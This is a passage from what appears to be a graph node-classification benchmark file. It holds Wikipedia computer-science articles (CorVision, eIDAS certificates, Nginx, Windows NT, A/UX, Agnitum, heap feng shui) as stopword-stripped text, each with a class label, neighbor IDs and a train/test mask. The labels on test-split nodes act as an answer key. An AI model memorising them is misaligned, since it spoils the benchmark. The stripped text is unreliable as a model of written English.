parameters fall five groupings follows usually default values parameters satisfactory corvision however allows setting changed time development parameters file wp accessed runtime latest setting always used corvision keeps information behind status screen up-to-date indicates current state development process left hand side indicates specification tasks need right hand side indicates generation tasks need changes additions specification cause changes dictionary datasets keys dictionary datasets keys screens reports menus corvision provides useful feature called field search field search allows investigate analyze use fields different aspects application allows developers assess impact changes made provide complete specification details hardcopy form corvision run reports option 80 different types report produced component specification reports csrs known also produced tentative unreferenced unresolved items key corvision procedures procedures corvision eventually become executable images .edo three types procedures essentially true consider procedure program fact procedure set instructions builder commands build program program builder actually called process program procedure therefore set builder commands instruct builder build process save program library compiled file .sav extension corvision keeps data structure files separate manipulated builder builder keeps structure file key structure file dataset used application process compiled data structures bound process time thus binding data structures takes place precise moment process compiled structure key structure files kept separate dataset definitions altered development major strength corvision allowing prototyping environment code data structures changed throughout development brought together compile time structure key structure files loaded process compiled done load file builder makes assumption data structures already loaded compiles process point compilation binds data structures code following files created following files also added following files created compiling",
    "neighbors": [
      11075,
      3142,
      9286,
      8393,
      4042,
      5677,
      10413,
      847,
      6129,
      5492,
      11604,
      987,
      11228,
      10590
    ],
    "mask": "Test"
  },
  {
    "node_id": 3231,
    "label": 4,
    "text": "Qualified_digital_certificate:qualified digital certificate context regulation eu 910/2014 eidas qualified digital certificate public key certificate issued qualified trust service provider ensures authenticity data integrity electronic signature accompanying message and/or attached data eidas defines several tiers electronic signatures used conducting public sector private transactions within across borders eu member states qualified digital certificate addition specific services provided qualified trust service provider required elevate status electronic signature considered qualified electronic signature using cryptography digital certificate also known public key certificate contains information link owner digital signature trust entity verifies authenticity content signed according eidas considered qualified digital certificate certificate must meet requirements provided annex regulation eu 910/2014 including limited need non-repudiation authentication electronic signatures originally addressed electronic signatures directive 1999/93/ec help facilitate secure transactions specifically occur across borders eu member states eidas regulation later replaced directive defined standards used creation qualified digital certificates trust service providers qualified digital certificate issued qualified trust service provider received authorization member state ’ supervisory body provide qualified trust services creating qualified electronic signatures provider must listed upon eu trust list otherwise permitted provide qualified digital certificates qualified trust services trust service provider required abide guidelines established eidas creating qualified digital certificate include court qualified electronic signature provided highest level probative value makes difficult refute authorship qualified electronic signature along qualified certificate given consideration handwritten signature used evidence legal proceedings validity qualified electronic signature created qualified certificate must accepted eu member states regardless member state signature produced parts world similar concepts created define standards electronic signatures switzerland digital signing standard zertes comparable standards address conformity regulation trust service providers product digital certificates united states nist digital signature standard dss provide comparable standard regulating qualified certificates would address non-repudiation signatory ’ qualified certificate amendment nist dss currently discussed would in-line eidas zertes handle trusted services",
    "neighbors": [
      3264,
      9576,
      2286,
      5200,
      9744,
      8018,
      1496,
      5433,
      1821
    ],
    "mask": "Test"
  },
  {
    "node_id": 3232,
    "label": 7,
    "text": "Logging_as_a_service:logging service logging service laas architectural model centrally ingesting collecting type log files coming given source location servers applications devices etc files normalized filtered reformatting forwarding dependent systems processed “ native ” data managed displayed ultimately disposed according predesignated retention schedule based number criteria enterprise situation datacenter becomes hub log files normalization managed service provider msp environment log sources would coming applications outside enterprise still hosted managed msp needed model datacenter acts private cloud concept cloud computing provision logs various stakeholders within organization future forensics analysis identify risks patterns activity predict behaviors based data collected within logs becomes hub service stakeholders become beneficiaries centralized data form alerts reports periphery applications predictive analysis insight big data graphical display",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 3233,
    "label": 9,
    "text": "AmigaBASIC:amigabasic amigabasic interpreted basic programming language implementation amiga designed written microsoft amigabasic shipped amigaos versions 1.1 1.3 succeeded metacomco abasic included amigaos 1.0 1.1 superseded arexx rexx-style scripting language amigaos version 2.0 onwards amigabasic provided common basic language also attempted provide easy-to-use api amiga unique graphics sound capabilities object commands example made easy create moving objects – sprites bobs could drawn external drawing program object editor supplied amigabasic unusual feature language theoretically allowed calling handwritten assembly language subprograms however feature never worked bug failed align assembly language instructions correctly word boundary required amiga native mc68000 processor compute popular computer magazine published amigabasic still shipped included many amigabasic type programs articles typically implementations simple programs rudimentary games system file utilities desk accessories analog clocks address books amigabasic rendered obsolete incompatibilities amigaos 2.0 hardware successors motorola 68000 cpu incompatibilities due disregard programming guidelines set forth commodore however number third-party compiled basic languages released amiga could compile amigabasic programs minimal changes like a/c basic cursor see compiled basics continued work amigaos 2.0 compiled rather interpreted generally ran much faster original although amigabasic superseded arexx amigaos 2.0 two languages different functions capabilities hobbyist programmers changed time amigaos 2.0 release likely interested scripting existing third party applications writing new programs entirely scratch arexx seen better fitting needs basic along microsoft similar basic apple macintosh amigabasic first basic interpreter require line numbers adopting instead top-down approach executing lines code labels indicate goto instruction jump however programs contained line numbers able run line numbers simply treated labels purpose flow control also first microsoft interpreted language capable calling os functions dynamic libraries command library example codice_1 command invokes standard amiga graphics.library call functions go one better adding following line amiga say hello world using speech synthesis addition displaying screen",
    "neighbors": [
      3718,
      139,
      7691,
      1805,
      9997,
      5264,
      2193,
      786,
      9236,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      9249,
      11683,
      5925,
      8101,
      4136,
      8618,
      10666,
      6062,
      303,
      432,
      7343,
      8369,
      8115,
      8494,
      9780,
      11315,
      4152,
      315,
      6075,
      7355,
      7486,
      7870,
      4160,
      4674,
      11076,
      8262,
      10750,
      712,
      10570,
      3533,
      1742,
      847,
      5709,
      850,
      4564,
      1879,
      6233,
      92,
      477,
      11229,
      5729,
      2915,
      9188,
      5733,
      7269,
      5736,
      11370,
      11243,
      2541,
      8429,
      5743,
      9714,
      5747,
      11123,
      759,
      9848,
      6778,
      6910,
      1535
    ],
    "mask": "None"
  },
  {
    "node_id": 3234,
    "label": 4,
    "text": "Heap_feng_shui:heap feng shui computer security heap feng shui technique used exploits facilitate arbitrary code execution technique attempts manipulate layout heap making heap allocations carefully selected sizes named feng shui ancient chinese system aesthetics involves selection precise alignments space term general used describe variety techniques bypassing heap protection strategies paper often credited naming technique heap feng shui javascript used refer exploit dangling pointer aligned portion attacker-controlled chunk however also found usage capture flag events describe attacks exploit characteristics heap layout spacing chunks",
    "neighbors": [
      1954,
      3270,
      8167,
      10894,
      3473,
      5682,
      11537,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3235,
    "label": 3,
    "text": "Architecture_of_Windows_NT:architecture windows nt architecture windows nt line operating systems produced sold microsoft layered design consists two main components user mode kernel mode preemptive reentrant multitasking operating system designed work uniprocessor symmetrical multiprocessor smp -based computers process input/output i/o requests use packet-driven i/o utilizes i/o request packets irps asynchronous i/o starting windows xp microsoft began making 64-bit versions windows available 32-bit versions operating systems programs subsystems user mode limited terms system resources access kernel mode unrestricted access system memory external devices kernel mode windows nt full access hardware system resources computer windows nt kernel hybrid kernel architecture comprises simple kernel hardware abstraction layer hal drivers range services collectively named executive exist kernel mode user mode windows nt made subsystems capable passing i/o requests appropriate kernel mode device drivers using i/o manager user mode layer windows nt made environment subsystems run applications written many different types operating systems integral subsystem operates system-specific functions behalf environment subsystems kernel mode stops user mode services applications accessing critical areas operating system access executive interfaces user mode subsystems deal i/o object management security process management kernel sits hardware abstraction layer executive provide multiprocessor synchronization thread interrupt scheduling dispatching trap handling exception dispatching kernel also responsible initializing device drivers bootup kernel mode drivers exist three levels highest level drivers intermediate drivers low-level drivers windows driver model wdm exists intermediate layer mainly designed binary source compatible windows 98 windows 2000 lowest level drivers either legacy windows nt device drivers control device directly plug play pnp hardware bus user mode made various system-defined processes dlls interface user mode applications operating system kernel functions called environment subsystem windows nt one implementing different api set mechanism designed support applications written many different types operating systems none environment subsystems directly access hardware access hardware functions done calling kernel mode routines four main environment subsystems win32 subsystem os/2 subsystem windows subsystem linux posix subsystem security subsystem deals security tokens grants denies access user accounts based resource permissions handles login requests initiates login authentication determines system resources need audited windows nt also looks active directory workstation service implements network redirector client side windows file print sharing implements local requests remote files printers redirecting appropriate servers network conversely server service allows computers network access file shares shared printers offered local system windows nt kernel mode full access hardware system resources computer runs code protected memory area controls access scheduling thread prioritization memory management interaction hardware kernel mode stops user mode services applications accessing critical areas operating system access user mode processes must ask kernel mode perform operations behalf x86 architecture supports four different privilege levels numbered 0 3 two extreme privilege levels used usermode programs run cpl 3 kernel runs cpl 0 two levels often referred ring 3 ring 0 respectively design decision done achieve code portability risc platforms support two privilege levels though breaks compatibility os/2 applications contain i/o privilege segments attempt directly access hardware code running kernel mode includes executive made many modules specific tasks kernel provides low-level services used executive hardware abstraction layer hal kernel drivers windows executive services make low-level kernel-mode portion contained file ntoskrnl.exe deals i/o object management security process management divided several subsystems among cache manager configuration manager i/o manager local procedure call lpc memory manager object manager process structure security reference monitor srm grouped together components called executive services internal name ex system services internal name nt i.e. system calls implemented level except call directly kernel layer better performance term service context generally refers callable routine set callable routines distinct concept service process user mode component somewhat analogous daemon unix-like operating systems kernel sits hal executive provides multiprocessor synchronization thread interrupt scheduling dispatching trap handling exception dispatching also responsible initializing device drivers bootup necessary get operating system running kernel performs almost tasks traditional microkernel strict distinction executive kernel prominent remnant original microkernel design historical design documentation consistently refers kernel component microkernel kernel often interfaces process manager level abstraction kernel never calls process manager way around save handful corner cases still never point functional dependence windows nt uses kernel-mode device drivers enable interact hardware devices drivers well defined system routines internal routines exports rest operating system devices seen user mode code file object i/o manager though i/o manager devices seen device objects defines either file device driver objects kernel mode drivers exist three levels highest level drivers intermediate drivers low level drivers highest level drivers file system drivers fat ntfs rely intermediate drivers intermediate drivers consist function drivers—or main driver device—that optionally sandwiched lower higher level filter drivers function driver relies bus driver—or driver services bus controller adapter bridge—which optional bus filter driver sits function driver intermediate drivers rely lowest level drivers function windows driver model wdm exists intermediate layer lowest level drivers either legacy windows nt device drivers control device directly pnp hardware bus lower level drivers directly control hardware rely drivers windows nt hardware abstraction layer hal layer physical hardware computer rest operating system designed hide differences hardware provide consistent platform kernel run hal includes hardware-specific code controls i/o interfaces interrupt controllers multiple processors however despite purpose designated place within architecture hal n't layer sits entirely kernel way kernel sits executive known hal implementations depend measure kernel even executive practice means kernel hal variants come matching sets specifically constructed work together particular hardware abstraction involve abstracting instruction set generally falls wider concept portability abstracting instruction set necessary handling several revisions x86 instruction set emulating missing math coprocessor performed kernel via hardware virtualization",
    "neighbors": [
      11270,
      5643,
      4624,
      7187,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      7728,
      2101,
      8246,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      7760,
      9808,
      4178,
      10839,
      603,
      9819,
      93,
      1632,
      3170,
      8301,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      3197,
      639,
      10879,
      8841,
      3723,
      6797,
      2193,
      9874,
      10900,
      7317,
      4248,
      7325,
      7838,
      9377,
      4771,
      6820,
      1703,
      2221,
      9391,
      3250,
      5300,
      7351,
      7356,
      2749,
      10428,
      11458,
      2244,
      8391,
      200,
      9420,
      9932,
      5840,
      9437,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      11498,
      3308,
      10993,
      242,
      5363,
      3834,
      5371,
      8445,
      1791,
      8959,
      11519,
      3856,
      3857,
      8976,
      11539,
      5397,
      3351,
      8473,
      8985,
      11546,
      8988,
      10016,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      4423,
      3922,
      2391,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      7057,
      11152,
      9114,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      5563,
      960,
      8132,
      6088,
      969,
      9166,
      3535,
      8659,
      1498,
      5594,
      478,
      8161,
      6114,
      6115,
      6637,
      9709,
      6128,
      6641,
      499,
      3573,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 3236,
    "label": 8,
    "text": "JackBe:jackbe jackbe corporation privately held vendor enterprise mashup software real-time intelligence applications august 2013 jackbe acquired software ag jackbe flagship product enterprise mashup platform called presto used enterprise mashups business management dashboards real-time intelligence applications jackbe ’ main product presto enterprise mashup platform presto provides real-time intelligence functionality self-service on-demand data integration business dashboards jackbe launched cloud computing-based version presto product march 2010 hosted amazon ec2 jackbe launched mashup sites sharepoint mss july 2010 jackbe announced enterprise app depot 2010 platform creating internal application directories enterprise app depot aimed non-developers business users allowing create new business applications share applications users industry analyst joe mckendrick described enterprise app store cool idea zdnet",
    "neighbors": [
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 3237,
    "label": 8,
    "text": "Nginx:nginx nginx like engine x stylized nginx nginx web server also used reverse proxy load balancer mail proxy http cache software created igor sysoev first publicly released 2004 company name founded 2011 provide support nginx plus paid software nginx free open-source software released terms bsd-like license large fraction web servers use nginx often load balancer march 2019 nginx company acquired f5 networks 670 million netcraft estimated nginx served 32 active websites ranked ranking first apache 29 top million websites neither ranked first ranked first 33 sources still estimate apache ahead overall according netcraft november 2016 web server survey nginx found second widely used web server across active sites 18.22 surveyed sites top million busiest sites 27.83 surveyed sites according w3techs used 37.7 top 1 million websites 49.7 top 100,000 websites 57.0 top 10,000 websites according builtwith used 38.2 top 10,000 websites growth within top 10k 100k 1 million segments increased 2018 survey docker usage found nginx commonly deployed technology docker containers wikipedia uses nginx ssl termination proxy openbsd release 5.2 1 november 2012 nginx became part openbsd base system providing alternative system fork apache 1.3 intended replace later replaced openbsd httpd 8 nginx deployed serve dynamic http content network using fastcgi scgi handlers scripts wsgi application servers phusion passenger modules serve software load balancer nginx uses asynchronous event-driven approach rather threads handle requests nginx modular event-driven architecture provide predictable performance high loads nginx default configuration file codice_1 features include upgrading executable configuration without client connections loss module-based architecture core third-party module support paid plus product includes additional features advanced load balancing access expanded suite metrics performance monitoring two versions nginx oss nginx nginx plus nginx plus offers additional features included oss nginx active health checks session persistence based cookies dns service discovery integration cache purging api appdynamic datalog dynatrace new relic plug-ins active-active ha config sync key-value store on-the-fly zero downtime updates upstream configurations key‑value stores using nginx plus api web application firewall waf dynamic module nginx written explicit goal outperforming apache web server box serving static files nginx uses dramatically less memory apache handle roughly four times many requests per second however performance boost comes cost decreased flexibility ability override systemwide access settings per-file basis apache accomplishes .htaccess file nginx feature built nginx also reputation harder install configure apache formerly adding third party modules nginx required recompiling application source modules statically linked partially overcome version 1.9.11 february 2016 addition dynamic module loading however modules still must compiled time nginx modules compatible system—some require older static linking process nginx generally considered less stable windows server linux apache equal support igor sysoev began development nginx 2002 originally nginx developed solve c10k problem fill needs websites including rambler search engine portal serving 500 million requests per day september 2008 nginx inc. founded july 2011 sysoev provide commercial products support software company principal place business san francisco california legally incorporated british virgin islands october 2011 nginx raised 3 million bv capital runa capital msd capital michael dell venture fund company announced commercial support options companies using nginx production nginx offered commercial support february 2012 paid nginx plus subscription august 2013 support packages focus installation configuration performance improvement etc support includes proactive notifications major changes security patches updates patches wordpress developer automattic inc. content delivery network provider maxcdn became funding partners update google spdy version 3.1 slated early 2014 nginx also offers consulting services assist customers custom configuration adding additional features october 2013 nginx raised 10 million series b investment round led new enterprise associates round included previous investors well aaron levie ceo founder box.com december 2014 nginx raised 20 million series b1 round led new enterprise associates participation e.ventures formerly bv capital runa capital index ventures nginx ceo gus robertson october 2017 nginx inc. announced general available nginx amplify saas providing monitoring analytics capabilities nginx september 2017 nginx announced api management tool nginx controller would build api gateway nginx plus june 2018 nginx raised 43 million series c funding round led goldman sachs accelerate application modernization digital transformation enterprises 11 march 2019 f5 networks acquired nginx",
    "neighbors": [
      2060,
      9229,
      10254,
      7695,
      1556,
      7702,
      2596,
      8745,
      44,
      10800,
      2098,
      9780,
      5178,
      6714,
      4668,
      10815,
      64,
      595,
      4186,
      6246,
      9320,
      9834,
      11376,
      9844,
      4725,
      11386,
      3707,
      8350,
      3746,
      8358,
      4777,
      7338,
      9387,
      11439,
      9909,
      1206,
      5815,
      5314,
      711,
      225,
      1250,
      4837,
      1257,
      6379,
      2287,
      7415,
      9987,
      7430,
      5900,
      7443,
      1304,
      10520,
      7457,
      8994,
      7983,
      823,
      9538,
      331,
      1363,
      3927,
      4439,
      2910,
      5470,
      865,
      2404,
      9580,
      10611,
      3966,
      10622,
      1920,
      11134,
      4485,
      7567,
      9616,
      1937,
      11154,
      5012,
      1952,
      11682,
      9125,
      11689,
      5547,
      11693,
      438,
      9151,
      10182,
      1991,
      10696,
      2003,
      3545,
      8691,
      2045,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 3238,
    "label": 3,
    "text": "Plug_compatible:plug compatible plug compatible refers hardware designed perform exactly like another vendor product term pcm refer term pcm originally applied manufacturers made replacements ibm peripherals later term used refer ibm-compatible computers rise pcm peripheral industry computing systems either many peripherals originally designed used specific central processing unit cpu term pcm originally applied manufacturers made replacements ibm peripherals first example plug compatible ibm subsystems tape drives controls offered telex beginning 1965 memorex 1968 first enter ibm plug-compatible disk followed shortly thereafter number suppliers cdc itel storage technology corporation boosted world largest user computing equipment directions ultimately plug-compatible products offered peripherals system main memory plug-compatible machine one designed backward compatible prior machine particular new computer system plug-compatible connectors protocol interfaces peripherals also binary-code compatibility—it runs software old system plug compatible manufacturer pcm company makes products one recurring theme plug-compatible systems ability bug compatible well forerunner system software interface problems successor must simulate problems otherwise new system may generate unpredictable results defeating full compatibility objective thus important customers understand difference bug feature latter defined intentional modification previous system e.g higher speed lighter weight smaller package better operator controls etc. original example pcm mainframes amdahl 470 mainframe computer plug-compatible ibm system 360 370 costing millions dollars develop ibm customer could literally remove 360 370 friday install amdahl 470 attach connectors peripherals channel interfaces new mainframe running software sunday night unfortunately system status indicators operators new system different introduced learning curve operators service technicians similar systems available comparex fujitsu hitachi large systems system vendors eventually left pcm market term may also used define replacement criteria components available multiple sources example plug-compatible cooling fan may need physical size shape also similar capability run voltage use similar power attach standard electrical connector similar mounting arrangements non-conforming units may re-packaged modified meet plug-compatible requirements adapter plate provided mounting different tool instructions supplied installation modifications would reflected bill materials components similar issues arise computer system interfaces competitors wish offer easy upgrade path general plug-compatible systems designed industry de facto standards rigorously defined environment large installed population machines benefit third-party enhancements plug compatible mean identical replacement however nothing prevents company developing follow-on products backward-compatible early products",
    "neighbors": [
      6020,
      8474,
      8301,
      9137,
      9363,
      10803,
      8502,
      6618,
      3323,
      1501
    ],
    "mask": "None"
  },
  {
    "node_id": 3239,
    "label": 7,
    "text": "Benchmark_Email:benchmark email benchmark email international internet-based service provider email marketing headquarters los alamitos ca company founded curt denise keller 2004 company offers various free paid editions benchmark member returnpath.net email sender provider coalition industry consortiums expansion international markets pursued company translating software english spanish french german chinese japanese portuguese italian establishing offices philippines japan china india spain taiwan italy among several countries recently website also launched french 2017 benchmark email named one 20 b2b technologies try 2017 forbes",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 3240,
    "label": 1,
    "text": "Relational_data_mining:relational data mining relational data mining data mining technique relational databases unlike traditional data mining algorithms look patterns single table propositional patterns relational data mining algorithms look patterns among multiple tables relational patterns types propositional patterns corresponding relational patterns example relational classification rules relational classification relational regression tree relational association rules several approaches relational data mining multi-relation association rules multi-relation association rules mrar new class association rules contrast primitive simple even multi-relational association rules usually extracted multi-relational databases rule item consists one entity several relations relations indicate indirect relationship entities consider following mrar first item consists three relations live nearby humid “ live place near city humid climate type also younger 20 health condition good ” association rules extractable rdbms data semantic web data",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 3241,
    "label": 2,
    "text": "A/UX:a/ux a/ux discontinued unix-based operating system apple computer custom integrated system 7 graphical interface application compatibility launched 1988 discontinued 1995 version 3.1.1 apple first official unix-based operating system a/ux requires select models 68k-based macintosh fpu paged memory management unit pmmu including macintosh ii se/30 quadra centris series predecessor macos variant unix currently bundled apple desktop computers described infoworld open systems solution macintosh heart operating system based unix system v release 2.2 includes additional features system v releases 3 4 bsd versions 4.2 4.3 posix system v interface definition svid compliant includes tcp/ip networking version 2 onward unix-compatible posix-compliant operating system made possible apple bid large contracts supply computers u.s. federal government institutes a/ux provides graphical user interface including familiar finder windows menus controls a/ux finder customized version system 7 finder adapted run unix process designed interact underlying unix file systems a/ux includes codice_1 terminal program offers command line interface underlying unix system x window system server application called macx terminal program also used interface system run x applications alongside finder alternatively user choose run fullscreen x11r4 session without finder apple compatibility layer allows a/ux run macintosh system 7.0.1 unix hybrid applications hybrid application uses functions macintosh toolbox unix system example run macintosh application calls unix system functions unix application calls macintosh toolbox functions quickdraw hypercard stack graphical frontend command-line unix application a/ux compatibility layer uses existing toolbox functions computer ’ rom function calls translated native unix system calls cooperatively multitasks macintosh apps single address space using token-passing system access toolbox a/ux includes utility called codice_2 similar tool name included macintosh programmer workshop assist users entering unix commands opening unix executable file finder opens dialog box allows user choose command-line options program using standard controls radio buttons check boxes display resulting command line argument user executing command program feature intended ease learning curve users new unix decrease user reliance unix manual a/ux utility allows user reformat third-party scsi drives way used macs era a/ux runs 68k-based macintoshes floating point unit fpu paged memory management unit pmmu even runs select models example quadra 840av apple fastest 68k macintosh run a/ux a/ux 1.0 announced february 1988 uniforum conference seven months behind schedule initially aimed existing unix customers universities vars. ref name= apple breaks unix market a/ux /ref system initially sold pre-installed macintosh ii although one could add larger monitor higher price purchase kit upgrading existing mac ii lower price third-party software announced system first release includes ingres database statview developer tools various productivity software packages based unix system v.2.2 additional features bsd unix networking support included tcp/ip appletalk nfs implementations developed unisoft base system gui running command line capable running single mac program time using system 6 interface although 10 existing mac software would run released 1989 a/ux 1.1 supplies basic gui system 6 finder chooser desk accessories control panels provisions unix x window system x11r3 gui draft 12 posix standard overall improved speed comparable low end sun workstation. ref name= a/ux release 1.1 supports x window /ref first posix compliant platform allowed apple join growing list industry heavyweights allowed us federal government burgeoning 6 billion bid market 1991 based aim alliance apple envisioned a/ux becoming basis drastically scaling concept macintosh system architecture application compatibility across computing industry personal enterprise markets apple formed new business division enterprise systems led director jim groff serve large businesses government higher education basing division upon maturing a/ux groff admitted apple major player unix market performed merely quiet marketing operating system fully intended become major player broad-based marketing objectives 1992 apple believed alliance ibm would merge a/ux aix system 7—thus ultimately scaling execution macintosh applications mac desktops ibm huge rs/6000 systems november 1991 apple launched a/ux 3.0 planning synchronize two ongoing release schedules a/ux system 7 time company also preannounced a/ux 4.0 expected release 1993 1994 announcement expounded upon historic technology partnership apple ibm expecting merge apple user-friendly graphical interface desktop applications market ibm highly scalable unix server market allowing two companies enter apple believed emerging general desktop open systems market upcoming a/ux 4.0 would target poweropen environment abi merge features ibm aix variant unix a/ux use osf/1 kernel open software foundation a/ux 3.0 would serve important migration path new system making unix system 7 applications compliant poweropen specification future a/ux 4.0 aix operating systems intended run variety ibm power powerpc hardware apple powerpc-based hardware april 1992 c2-level secure version a/ux released coincidentally aim alliance launched apple/ibm partner corporation taligent inc. one month earlier mission bringing pink market grandly universal operating system application framework contrary announcements apple eventually abandoned plans a/ux 4.0 never releasing product 1995 company withdrew taligent partnership poweropen discontinued 1996 discontinued two-year copland project intended become mac os 8 host taligent software 1996 1997 company deployed short-lived platform apple network server systems based upon powerpc hardware customized ibm aix operating system company overall failed operating system strategy left badly aged system 7 successor following apple 1996 acquisition next apple introduced 1999 mac os x server descendant unix-based nextstep operating system final release a/ux version 3.1.1 1995 apple abandoned a/ux platform completely 1996 a/ux 1.0 criticized 1988 infoworld review largely command-driven user interface unix variants rather graphical system 6 networking support praised though byte 1989 listed a/ux 1.1 among excellence winners byte awards stating could make unix multitasking operating system choice next decade challenge os/2 compared contemporary workstations unix vendors however macintosh hardware lacks features demand paging first two versions a/ux consequently suffer poor performance poor sales users also complained amount disk space uses standard macintosh though comparable unix system august 1992 issue infoworld author favorably reviewed a/ux 3.0 describing open systems solution macintosh heart apple finally gets unix right praised gui single-button point-and-click installer one year personal tech support graphical help dialogs user manuals saying a/ux defies stereotype unix difficult use easiest version unix learn list price much higher much weaker competing pc operating systems system 7 os/2 ms-dos windows 3.1 low compared prevailing proprietary unix licenses review found system speed acceptable great even fastest quadra 950 blaming software incomplete unix optimization found apple hardware though good value system price-performance ratio judged altogether uncompetitive sun sparcstation 2 reviewers thought unlikely users want buy macs run a/ux would awarded infoworld top score os proprietary macintosh hardware tony bove bove rhodes report generally complained f unix super-users compelling reason buy apple unix apple a/ux always way sell macs unix check-off item users a/ux requires specific raw hardware access execution a/ux within macintosh emulation software impossible 2014 introduction macintosh ii emulator named shoebill vintage a/ux users one central repository a/ux applications internet server nasa called jagubox administered jim jagielski also editor a/ux faq",
    "neighbors": [
      2560,
      7682,
      10755,
      9732,
      8207,
      4114,
      6675,
      8725,
      1561,
      8222,
      9762,
      6186,
      8754,
      7224,
      9784,
      1595,
      8767,
      576,
      8774,
      2120,
      6218,
      2132,
      86,
      1623,
      9308,
      3167,
      3681,
      5731,
      11363,
      7269,
      6760,
      633,
      6780,
      7806,
      640,
      2179,
      132,
      4741,
      6787,
      6283,
      7307,
      6807,
      671,
      7842,
      11430,
      7848,
      3248,
      9921,
      10436,
      4807,
      213,
      3286,
      9952,
      6369,
      9444,
      6377,
      4844,
      11501,
      5363,
      8441,
      11513,
      3323,
      2811,
      2301,
      11013,
      6412,
      787,
      5397,
      1304,
      8991,
      7460,
      3371,
      6445,
      7983,
      823,
      7991,
      2363,
      7483,
      2365,
      2366,
      9027,
      10052,
      4423,
      8020,
      11608,
      3948,
      5492,
      2424,
      5498,
      5506,
      4997,
      6023,
      3977,
      11145,
      6539,
      7566,
      414,
      3487,
      3488,
      6049,
      11171,
      5036,
      10156,
      1971,
      2995,
      1461,
      9141,
      9151,
      470,
      7133,
      6624,
      4067,
      1508,
      5093,
      9700,
      4076,
      2035,
      5619,
      11257,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3242,
    "label": 4,
    "text": "System_Reconfiguration_Attacks:system reconfiguration attacks system reconfiguration attacks modify settings user ’ pc malicious purposes example urls favorites file might modified direct users look-alike websites e.g. bank website url may changed “ bankofabc.com ” “ bancofabc.com ” بتعديل الإعدادات على جهاز الكمبيوتر الخاص بالمستخدم والهدف من هذا التعديل أهداف ضارة system reconfiguration attacks تقوم هجمات إعادة تهيئة النظام",
    "neighbors": [
      2945,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3243,
    "label": 4,
    "text": "Agnitum:agnitum agnitum ltd founded 1999 st. petersburg russia software company 2000 agnitum hired 2 developers increased number staff people 20 2002 agnitum originally focused anti-trojan pc connections monitoring solutions targeted windows pcs users company known mostly personal firewall internet security products provider outpost firewall pro flagship product company released 2002 together freeware solution updated 2009 agnitum products mostly consumer-oriented taking account licensing agnitum products technologies several national security software publishers january 14 2016 agnitum confirmed official blog company acquired yandex december 2015 february 28 2017 final phase sale yandex agnitum site user forum shut agnitum established software producer 1999 st. petersburg russia two students baltic state technical university distributing software online shareware agnitum sold niche software entering 2002 pc firewalls market agnitum software become rather popular 2002 agnitum began formally implement international distribution strategy putting place agreements partners major european markets well germany italy spain poland 2003 2006 agnitum strengthened european american far east market positions personal firewall engine company became basis company products thus integrated several firms security solutions partnering security vendors provide personal firewall anti-spyware technologies 2003-2006 agnitum announced contracts anti-virus solutions vendors whole re-branded software part vendor suite sophos uk usa lavasoft sweden novell usa virusbuster hungary others 2006 agnitum criticized microsoft onecare firewall agnitum claimed leaks faced simplest attacks programs test firewalls leaks agnitum chief software architect posted less-than-glowing assessment microsoft windows firewall part company entry security software business 2006 agnitum entered strategic alliance virusbuster experienced anti-virus vendor hungary agnitum aimed enter market internet security suite solutions compete anti-virus vendors kaspersky zonelabs etc already integrated personal firewalls personal security solutions mostly personal anti-viruses additional spyware adware spam web content filtering engines 2007-2008 agnitum finally entered market anti-virus solutions anti-virus products began participating international domestic test labs tests virus bulletin vb100 anti-malware.ru anti-virus tests outpost firewall pro tested leaktests killtests independent research portals 2009 2010 agnitum released 2 freeware editions outpost software outpost firewall pro free edition outpost security suite free continue competition well-known zonealarm comodo free pc firewall vendors agnitum first software products anti-trojan tool tauscan pc connections monitoring tool jammer anti-trojan software tauscan occasionally achieved attention media received awards jammer focused detecting blocking attacks hackers prototype outpost personal firewall launched simultaneously “ free ” “ pro ” versions march 2002 march 2007 agnitum released free anti-spam plug-in filtering microsoft outlook outlook express mail supports bat since 2008 may 2007 agnitum released combined internet security suite solution — outpost security suite pro ossp proactive solution basis outpost firewall agnitum anti-spam licensed anti-virus combined agnitum anti-spyware october 2007 agnitum released microsoft vista-compatible outpost 2008 products outpost firewall pro began pass leak-tests kill-tests matousec transparent security firewall challenge project independent project proactive security software testing 2010 agnitum released extension freeware solution outpost security suite free include anti-virus anti-spyware anti-spam free internet security suite moment agnitum security products available following languages english german french spanish russian default also lot localized outpost software versions like italian polish hungarian japanese traditional simplified chinese korean turkish dutch brazilian portuguese agnitum firewall anti-spyware anti-virus engines became almost independent products several security companies licensing agnitum technologies integrate products list companies made publicity licensing novell novell os client security agent sophos corporate edition client agent bullguard internet security solution lavasoft personal firewall client agent cat/quickheal indian anti-virus solutions vendor total security solution",
    "neighbors": [
      2049,
      1052,
      550,
      10790,
      2601,
      6699,
      8753,
      569,
      5178,
      10308,
      2118,
      2654,
      8816,
      10872,
      9341,
      127,
      7809,
      131,
      6797,
      1172,
      156,
      2721,
      2213,
      6823,
      1708,
      6834,
      704,
      10433,
      7362,
      202,
      4814,
      9423,
      1242,
      6364,
      5860,
      6382,
      8943,
      9971,
      1273,
      9983,
      1792,
      5891,
      11019,
      3342,
      4374,
      9496,
      6431,
      5924,
      1318,
      8998,
      2859,
      3885,
      4403,
      9523,
      823,
      11577,
      9537,
      1858,
      11073,
      4421,
      1355,
      10574,
      8024,
      9048,
      2907,
      9055,
      9569,
      3941,
      3942,
      11622,
      4464,
      3955,
      4480,
      1417,
      3981,
      10637,
      3482,
      1436,
      4511,
      8614,
      8615,
      10166,
      7103,
